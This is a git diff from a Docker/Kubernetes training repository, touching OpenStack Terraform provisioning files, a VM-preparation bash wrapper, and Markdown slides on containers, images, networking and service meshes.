value = "${join("\n", openstack_compute_floatingip_v2.machine.*.address)}"
}
variable "flavor" {}

View File

@@ -1,23 +0,0 @@
resource "openstack_networking_network_v2" "internal" {
name = "${var.prefix}"
}
resource "openstack_networking_subnet_v2" "internal" {
name = "${var.prefix}"
network_id = "${openstack_networking_network_v2.internal.id}"
cidr = "10.10.0.0/16"
ip_version = 4
dns_nameservers = ["1.1.1.1"]
}
resource "openstack_networking_router_v2" "router" {
name = "${var.prefix}"
external_network_id = "15f0c299-1f50-42a6-9aff-63ea5b75f3fc"
}
resource "openstack_networking_router_interface_v2" "router_internal" {
router_id = "${openstack_networking_router_v2.router.id}"
subnet_id = "${openstack_networking_subnet_v2.internal.id}"
}

View File

@@ -1,13 +0,0 @@
provider "openstack" {
user_name = "${var.user}"
tenant_name = "${var.tenant}"
domain_name = "${var.domain}"
password = "${var.password}"
auth_url = "${var.auth_url}"
}
variable "user" {}
variable "tenant" {}
variable "domain" {}
variable "password" {}
variable "auth_url" {}

View File

@@ -1,12 +0,0 @@
resource "openstack_networking_secgroup_v2" "full_access" {
name = "${var.prefix} - full access"
}
resource "openstack_networking_secgroup_rule_v2" "full_access" {
direction = "ingress"
ethertype = "IPv4"
protocol = ""
remote_ip_prefix = "0.0.0.0/0"
security_group_id = "${openstack_networking_secgroup_v2.full_access.id}"
}

View File

@@ -1,8 +0,0 @@
variable "prefix" {
type = "string"
}
variable "count" {
type = "string"
}

View File

@@ -1,19 +1,20 @@
#!/bin/bash
# Get the script's real directory.
# This should work whether we're being called directly or via a symlink.
# Get the script's real directory, whether we're being called directly or via a symlink
if [ -L "$0" ]; then
export SCRIPT_DIR=$(dirname $(readlink "$0"))
else
export SCRIPT_DIR=$(dirname "$0")
fi
# Load all scriptlets.
# Load all scriptlets
cd "$SCRIPT_DIR"
for lib in lib/*.sh; do
. $lib
done
TRAINER_IMAGE="preparevms_prepare-vms"
DEPENDENCIES="
aws
ssh
@@ -24,26 +25,49 @@ DEPENDENCIES="
man
"
# Check for missing dependencies, and issue a warning if necessary.
missing=0
for dependency in $DEPENDENCIES; do
if ! command -v $dependency >/dev/null; then
warning "Dependency $dependency could not be found."
missing=1
fi
done
if [ $missing = 1 ]; then
warning "At least one dependency is missing. Install it or try the image wrapper."
fi
ENVVARS="
AWS_ACCESS_KEY_ID
AWS_SECRET_ACCESS_KEY
AWS_DEFAULT_REGION
SSH_AUTH_SOCK
"
# Check if SSH_AUTH_SOCK is set.
# (If it's not, deployment will almost certainly fail.)
if [ -z "${SSH_AUTH_SOCK}" ]; then
warning "Environment variable SSH_AUTH_SOCK is not set."
warning "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
fi
check_envvars() {
status=0
for envvar in $ENVVARS; do
if [ -z "${!envvar}" ]; then
error "Environment variable $envvar is not set."
if [ "$envvar" = "SSH_AUTH_SOCK" ]; then
error "Hint: run 'eval \$(ssh-agent) ; ssh-add' and try again?"
fi
status=1
fi
done
return $status
}
# Now check which command was invoked and execute it.
check_dependencies() {
status=0
for dependency in $DEPENDENCIES; do
if ! command -v $dependency >/dev/null; then
warning "Dependency $dependency could not be found."
status=1
fi
done
return $status
}
check_image() {
docker inspect $TRAINER_IMAGE >/dev/null 2>&1
}
check_envvars \
|| die "Please set all required environment variables."
check_dependencies \
|| warning "At least one dependency is missing. Install it or try the image wrapper."
# Now check which command was invoked and execute it
if [ "$1" ]; then
cmd="$1"
shift
@@ -53,3 +77,6 @@ fi
fun=_cmd_$cmd
type -t $fun | grep -q function || die "Invalid command: $cmd"
$fun "$@"
# export SSH_AUTH_DIRNAME=$(dirname $SSH_AUTH_SOCK)
# docker-compose run prepare-vms "$@"

View File

@@ -1,4 +0,0 @@
FROM alpine:3.9
RUN apk add --no-cache entr py-pip git
COPY requirements.txt .
RUN pip install -r requirements.txt

View File

@@ -34,14 +34,6 @@ compile each `foo.yml` file into `foo.yml.html`.
You can also run `./build.sh forever`: it will monitor the current
directory and rebuild slides automatically when files are modified.
If you have problems running `./build.sh` (because of
Python dependencies or whatever),
you can also run `docker-compose up` in this directory.
It will start the `./build.sh forever` script in a container.
It will also start a web server exposing the slides
(but the slides should also work if you load them from your
local filesystem).
## Publishing pipeline
@@ -61,4 +53,4 @@ You can run `./slidechecker foo.yml.html` to check for
missing images and show the number of slides in that deck.
It requires `phantomjs` to be installed. It takes some
time to run so it is not yet integrated with the publishing
pipeline.
pipeline.

View File

@@ -1,8 +0,0 @@
# Uncomment and/or edit one of the the following lines if necessary.
#/ /kube-halfday.yml.html 200
#/ /kube-fullday.yml.html 200
#/ /kube-twodays.yml.html 200
/ /k8s-201.yml.html 200!
# And this allows to do "git clone https://container.training".
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack

View File

@@ -223,7 +223,7 @@ def check_exit_status():
def setup_tmux_and_ssh():
if subprocess.call(["tmux", "has-session"]):
logging.error("Couldn't connect to tmux. Please setup tmux first.")
ipaddr = "$IPADDR"
ipaddr = open("../../prepare-vms/ips.txt").read().split("\n")[0]
uid = os.getuid()
raise Exception("""

View File

@@ -1,6 +1,3 @@
class: title
# Advanced Dockerfiles
![construction](images/title-advanced-dockerfiles.jpg)

View File

@@ -150,84 +150,21 @@ Different deployments will use different underlying technologies.
* Ad-hoc deployments can use a master-less discovery protocol
like avahi to register and discover services.
* It is also possible to do one-shot reconfiguration of the
ambassadors. It is slightly less dynamic but has far fewer
ambassadors. It is slightly less dynamic but has much less
requirements.
* Ambassadors can be used in addition to, or instead of, overlay networks.
---
## Service meshes
## Section summary
* A service mesh is a configurable network layer.
We've learned how to:
* It can provide service discovery, high availability, load balancing, observability...
* Understand the ambassador pattern and what it is used for (service portability).
* Service meshes are particularly useful for microservices applications.
For more information about the ambassador pattern, including demos on Swarm and ECS:
* Service meshes are often implemented as proxies.
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
* Applications connect to the service mesh, which relays the connection where needed.
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
*Does that sound familiar?*
---
## Ambassadors and service meshes
* When using a service mesh, a "sidecar container" is often used as a proxy
* Our services connect (transparently) to that sidecar container
* That sidecar container figures out where to forward the traffic
... Does that sound familiar?
(It should, because service meshes are essentially app-wide or cluster-wide ambassadors!)
---
## Some popular service meshes
... And related projects:
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
<br/>
Transparently secures service-to-service connections with mTLS.
* [Gloo](https://gloo.solo.io/)
<br/>
API gateway that can interconnect applications on VMs, containers, and serverless.
* [Istio](https://istio.io/)
<br/>
A popular service mesh.
* [Linkerd](https://linkerd.io/)
<br/>
Another popular service mesh.
---
## Learning more about service meshes
A few blog posts about service meshes:
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
<br/>
Provides historical context: how did we do before service meshes were invented?
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
<br/>
Explains the purpose of service meshes. Illustrates some NGINX features.
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
<br/>
Includes high-level overview and definitions.
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
<br/>
Includes a step-by-step demo of Linkerd.
And a video:
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)

View File

@@ -36,7 +36,7 @@ docker run jpetazzo/hamba 80 www1:80 www2:80
* Appropriate for mandatory parameters (without which the service cannot start).
* Convenient for "toolbelt" services instantiated many times.
* Convenient for "toolbelt" services instanciated many times.
(Because there is no extra step: just run it!)
@@ -63,7 +63,7 @@ docker run -e ELASTICSEARCH_URL=http://es42:9201/ kibana
* Appropriate for optional parameters (since the image can provide default values).
* Also convenient for services instantiated many times.
* Also convenient for services instanciated many times.
(It's as easy as command-line parameters.)
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
* Allows arbitrary customization and complex configuration files.
* Requires writing a configuration file. (Obviously!)
* Requires to write a configuration file. (Obviously!)
* Requires building an image to start the service.
* Requires to build an image to start the service.
* Requires rebuilding the image to reconfigure the service.
* Requires to rebuild the image to reconfigure the service.
* Requires rebuilding the image to upgrade the service.
* Requires to rebuild the image to upgrade the service.
* Configured images can be stored in registries.
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
* Allows arbitrary customization and complex configuration files.
* Requires creating a volume for each different configuration.
* Requires to create a volume for each different configuration.
* Services with identical configurations can use the same volume.
* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
* Configuration can be generated or edited through another container.
@@ -198,4 +198,4 @@ E.g.:
- read the secret on stdin when the service starts,
- pass the secret using an API endpoint.
- pass the secret using an API endpoint.

View File

@@ -144,10 +144,6 @@ At a first glance, it looks like this would be particularly useful in scripts.
However, if we want to start a container and get its ID in a reliable way,
it is better to use `docker run -d`, which we will cover in a bit.
(Using `docker ps -lq` is prone to race conditions: what happens if someone
else, or another program or script, starts another container just before
we run `docker ps -lq`?)
---
## View the logs of a container
@@ -257,7 +253,7 @@ $ docker kill 068 57ad
The `stop` and `kill` commands can take multiple container IDs.
Those containers will be terminated immediately (without
the 10-second delay).
the 10 seconds delay).
Let's check that our containers don't show up anymore:

View File

@@ -131,12 +131,6 @@ Sending build context to Docker daemon 2.048 kB
* Be careful (or patient) if that directory is big and your link is slow.
* You can speed up the process with a [`.dockerignore`](https://docs.docker.com/engine/reference/builder/#dockerignore-file) file
* It tells docker to ignore specific files in the directory
* Only ignore files that you won't need in the build context!
---
## Executing each step

View File

@@ -222,16 +222,16 @@ CMD ["hello world"]
Let's build it:
```bash
$ docker build -t myfiglet .
$ docker build -t figlet .
...
Successfully built 6e0b6a048a07
Successfully tagged myfiglet:latest
Successfully tagged figlet:latest
```
Run it without parameters:
```bash
$ docker run myfiglet
$ docker run figlet
_ _ _ _
| | | | | | | | |
| | _ | | | | __ __ ,_ | | __|
@@ -246,7 +246,7 @@ $ docker run myfiglet
Now let's pass extra arguments to the image.
```bash
$ docker run myfiglet hola mundo
$ docker run figlet hola mundo
_ _
| | | | |
| | __ | | __, _ _ _ _ _ __| __
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
What if we want to run a shell in our container?
We cannot just do `docker run myfiglet bash` because
We cannot just do `docker run figlet bash` because
that would just tell figlet to display the word "bash."
We use the `--entrypoint` parameter:
```bash
$ docker run -it --entrypoint bash myfiglet
$ docker run -it --entrypoint bash figlet
root@6027e44e2955:/#
```

View File

@@ -78,7 +78,7 @@ First step: clone the source code for the app we will be working on.
```bash
$ cd
$ git clone https://github.com/jpetazzo/trainingwheels
$ git clone git://github.com/jpetazzo/trainingwheels
...
$ cd trainingwheels
```

View File

@@ -67,8 +67,7 @@ The following list is not exhaustive.
Furthermore, we limited the scope to Linux containers.
We can also find containers (or things that look like containers) on other platforms
like Windows, macOS, Solaris, FreeBSD ...
Containers also exist (sometimes with other names) on Windows, macOS, Solaris, FreeBSD ...
---
@@ -86,7 +85,7 @@ like Windows, macOS, Solaris, FreeBSD ...
* No notion of image (container filesystems have to be managed manually).
* Networking has to be set up manually.
* Networking has to be setup manually.
---
@@ -112,7 +111,7 @@ like Windows, macOS, Solaris, FreeBSD ...
* Strong emphasis on security (through privilege separation).
* Networking has to be set up separately (e.g. through CNI plugins).
* Networking has to be setup separately (e.g. through CNI plugins).
* Partial image management (pull, but no push).
@@ -152,37 +151,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
* Basic image support (tar archives and raw disk images).
* Network has to be set up manually.
---
## Kata containers
* OCI-compliant runtime.
* Fusion of two projects: Intel Clear Containers and Hyper runV.
* Run each container in a lightweight virtual machine.
* Requires running on bare metal *or* with nested virtualization.
---
## gVisor
* OCI-compliant runtime.
* Implements a subset of the Linux kernel system calls.
* Written in go, uses a smaller subset of system calls.
* Can be heavily sandboxed.
* Can run in two modes:
* KVM (requires bare metal or nested virtualization),
* ptrace (no requirement, but slower).
* Network has to be setup manually.
---
@@ -205,3 +174,4 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
- Docker is a good default choice
- If you use Kubernetes, the engine doesn't matter

View File

@@ -107,17 +107,9 @@ class: pic
class: pic
## Two containers on a single Docker network
![bridge2](images/bridge2.png)
---
class: pic
## Two containers on two Docker networks
![bridge3](images/bridge3.png)
![bridge3](images/bridge2.png)
---
@@ -474,7 +466,7 @@ When creating a network, extra options can be provided.
* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
---
@@ -528,9 +520,7 @@ Very short instructions:
- `docker network create mynet --driver overlay`
- `docker service create --network mynet myimage`
If you want to learn more about Swarm mode, you can check
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
or [these slides](https://container.training/swarm-selfpaced.yml.html).
See http://jpetazzo.github.io/container.training for all the deets about clustering!
---
@@ -556,7 +546,7 @@ General idea:
* So far, we have specified which network to use when starting the container.
* The Docker Engine also allows connecting and disconnecting while the container is running.
* The Docker Engine also allows to connect and disconnect while the container runs.
* This feature is exposed through the Docker API, and through two Docker CLI commands:
@@ -723,20 +713,3 @@ eth0 Link encap:Ethernet HWaddr 02:42:AC:15:00:03
...
```
]
---
class: extra-details
## Building with a custom network
* We can build a Dockerfile with a custom network with `docker build --network NAME`.
* This can be used to check that a build doesn't access the network.
(But keep in mind that most Dockerfiles will fail,
<br/>because they need to install remote packages and dependencies!)
* This may be used to access an internal package repository.
(But try to use a multi-stage build instead, if possible!)

View File

@@ -76,78 +76,6 @@ CMD ["python", "app.py"]
---
## Be careful with `chown`, `chmod`, `mv`
* Layers cannot store efficiently changes in permissions or ownership.
* Layers cannot represent efficiently when a file is moved either.
* As a result, operations like `chown`, `chown`, `mv` can be expensive.
* For instance, in the Dockerfile snippet below, each `RUN` line
creates a layer with an entire copy of `some-file`.
```dockerfile
COPY some-file .
RUN chown www-data:www-data some-file
RUN chmod 644 some-file
RUN mv some-file /var/www
```
* How can we avoid that?
---
## Put files on the right place
* Instead of using `mv`, directly put files at the right place.
* When extracting archives (tar, zip...), merge operations in a single layer.
Example:
```dockerfile
...
RUN wget http://.../foo.tar.gz \
&& tar -zxf foo.tar.gz \
&& mv foo/fooctl /usr/local/bin \
&& rm -rf foo
...
```
---
## Use `COPY --chown`
* The Dockerfile instruction `COPY` can take a `--chown` parameter.
Examples:
```dockerfile
...
COPY --chown=1000 some-file .
COPY --chown=1000:1000 some-file .
COPY --chown=www-data:www-data some-file .
```
* The `--chown` flag can specify a user, or a user:group pair.
* The user and group can be specified as names or numbers.
* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
*(In the container, not on the host!)*
---
## Set correct permissions locally
* Instead of using `chmod`, set the right file permissions locally.
* When files are copied with `COPY`, permissions are preserved.
---
## Embedding unit tests in the build process
```dockerfile

View File

@@ -169,5 +169,5 @@ Would we give the same answers to the questions on the previous slide?
class: pic
![Cloud Native Landscape](https://landscape.cncf.io/images/landscape.png)
![Cloud Native Landscape](https://raw.githubusercontent.com/cncf/landscape/master/landscape/CloudNativeLandscape_latest.png)

View File

@@ -1,5 +0,0 @@
# Exercise — writing a Compose file
Let's write a Compose file for the wordsmith app!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -1,9 +0,0 @@
# Exercise — writing better Dockerfiles
Let's update our Dockerfiles to leverage multi-stage builds!
The code is at: https://github.com/jpetazzo/wordsmith
Use a different tag for these images, so that we can compare their sizes.
What's the size difference between single-stage and multi-stage builds?

View File

@@ -1,5 +0,0 @@
# Exercise — writing Dockerfiles
Let's write Dockerfiles for an existing application!
The code is at: https://github.com/jpetazzo/wordsmith

View File

@@ -203,90 +203,4 @@ bash: figlet: command not found
* The basic Ubuntu image was used, and `figlet` is not here.
---
## Where's my container?
* Can we reuse that container that we took time to customize?
*We can, but that's not the default workflow with Docker.*
* What's the default workflow, then?
*Always start with a fresh container.*
<br/>
*If we need something installed in our container, build a custom image.*
* That seems complicated!
*We'll see that it's actually pretty easy!*
* And what's the point?
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
---
## Pets vs. Cattle
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
* Pets:
* have distinctive names and unique configurations
* when they have an outage, we do everything we can to fix them
* Cattle:
* have generic names (e.g. with numbers) and generic configuration
* configuration is enforced by configuration management, golden images ...
* when they have an outage, we can replace them immediately with a new server
* What's the connection with Docker and containers?
---
## Local development environments
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
* create VM from base template (Ubuntu, CentOS...)
* install packages, set up environment
* work on project
* when done, shut down VM
* next time we need to work on project, restart VM as we left it
* if we need to tweak the environment, we do it live
* Over time, the VM configuration evolves, diverges.
* We don't have a clean, reliable, deterministic way to provision that environment.
---
## Local development with Docker
* With Docker, the workflow looks like this:
* create container image with our dev environment
* run container with that image
* work on project
* when done, shut down container
* next time we need to work on project, start a new container
* if we need to tweak the environment, we create a new image
* We have a clear definition of our environment, and can share it reliably with others.
* Let's see in the next chapters how to bake a custom image with `figlet`!
* We will see in the next chapters how to bake a custom image with `figlet`.

View File

@@ -1,4 +1,3 @@
class: title
# Getting inside a container

View File

@@ -66,21 +66,6 @@ class: pic
---
## Differences between containers and images
* An image is a read-only filesystem.
* A container is an encapsulated set of processes,
running in a read-write copy of that filesystem.
* To optimize container boot time, *copy-on-write* is used
instead of regular copy.
* `docker run` starts a container from a given image.
---
class: pic
## Multiple containers sharing the same image
@@ -89,6 +74,20 @@ class: pic
---
## Differences between containers and images
* An image is a read-only filesystem.
* A container is an encapsulated set of processes running in a
read-write copy of that filesystem.
* To optimize container boot time, *copy-on-write* is used
instead of regular copy.
* `docker run` starts a container from a given image.
---
## Comparison with object-oriented programming
* Images are conceptually similar to *classes*.
@@ -119,7 +118,7 @@ If an image is read-only, how do we change it?
* The only way to create an image is by "freezing" a container.
* The only way to create a container is by instantiating an image.
* The only way to create a container is by instanciating an image.
* Help!
@@ -178,11 +177,8 @@ Let's explain each of them.
## Root namespace
The root namespace is for official images.
They are gated by Docker Inc.
They are generally authored and maintained by third parties.
The root namespace is for official images. They are put there by Docker Inc.,
but they are generally authored and maintained by third parties.
Those images include:
@@ -192,7 +188,7 @@ Those images include:
* Ready-to-use components and services, like redis, postgresql...
* Over 150 at this point!
* Over 130 at this point!
---
@@ -220,7 +216,7 @@ clock
---
## Self-hosted namespace
## Self-Hosted namespace
This namespace holds images which are not hosted on Docker Hub, but on third
party registries.
@@ -237,13 +233,6 @@ localhost:5000/wordpress
* `localhost:5000` is the host and port of the registry
* `wordpress` is the name of the image
Other examples:
```bash
quay.io/coreos/etcd
gcr.io/google-containers/hugo
```
---
## How do you store and manage images?
@@ -363,8 +352,6 @@ Do specify tags:
* To ensure that the same version will be used everywhere.
* To ensure repeatability later.
This is similar to what we would do with `pip install`, `npm install`, etc.
---
## Section summary

Some files were not shown because too many files have changed in this diff Show More